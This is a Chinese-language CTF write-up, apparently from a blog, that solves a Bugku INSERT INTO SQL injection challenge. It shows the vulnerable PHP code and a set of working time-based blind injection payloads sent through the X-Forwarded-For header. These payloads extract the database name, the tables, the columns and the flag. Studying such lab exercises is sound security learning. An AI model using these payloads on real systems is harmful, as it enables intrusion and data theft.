[Bugku] INSERT INTO注入

最近要复习基础，又回顾了一把sqli-labs结果发现还是有一些奇技淫巧没有收录进去，正好想起来bugku上有一道insert注入的题，特地写一写，记录一下。

开局送源码，hint是用python写个脚本吧。盲猜这个题得盲注了不然其他注入也不太用得上写脚本。

error_reporting(0);
function getIp()
{
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

明确注入点，是走的http报头的x-forwarded-for。但是过滤了,所以常规update和extractvalue的报错注入就没法用了。好在还有一个select case when xxx then xxx else xxx end;

而且由于逗号被过滤，导致substr和substring无法正常使用，所以得用 from 1 for 1 替代

开始先手注测试，抓包在请求头中加入X-Forwarded-For

X-Forwarded-For:127.0.0.1' and (select case when (length(database())=5) then sleep(5) else 1 end) and '1'='1

手测测出数据库长度为5，接下来写个通用注入语句就可以跑了.

payload如下：

127.0.0.1' and (select case when (ascii(substr((select database()) from 1 for 1))=119) then sleep(5) else 1 end) and '1'='1

127.0.0.1' and (select case when (length((select group_concat(table_name)from information_schema.tables where table_schema=database()))=14) then sleep(5) else 1 end) and '1'='1

127.0.0.1' and (select case when (ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1

127.0.0.1' and (select case when (length((select group_concat(column_name)from information_schema.columns where table_name='flag'))=4) then sleep(5) else 1 end) and '1'='1

127.0.0.1' and (select case when (ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag') from 1 for 1))=102) then sleep(5) else 1 end) and '1'='1

127.0.0.1' and (select case when (length((select group_concat(flag)from flag))=32) then sleep(5) else 1 end) and '1'='1

127.0.0.1' and (select case when (ascii(substr((select group_concat(flag)from flag) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1

所有的payload都写出来了，脚本就容易了，利用二分法，在header里面添加X-Forwarded-For用payload赋值。

[Bugku] INSERT INTO注入

[Bugku] INSERT INTO注入

发表评论取消回复

SSRF漏洞入门

巅峰极客2020部分write up

php://filter一些奇技淫巧

SSTI-模板注入

从几个CTF题目学习内存取证(一)

[BJDCTF2020]ZJCTF，不过如此

IdekCTF 2023 Forensics 复现记录 - 1

[HCTF 2018]admin

[强网杯 2019]高明的黑客

数据库对文件的读写和UDF提权基础

[Bugku] INSERT INTO注入

[Bugku] INSERT INTO注入

[Bugku] INSERT INTO注入

发表评论 取消回复

[Bugku] INSERT INTO注入

[Bugku] INSERT INTO注入

发表评论取消回复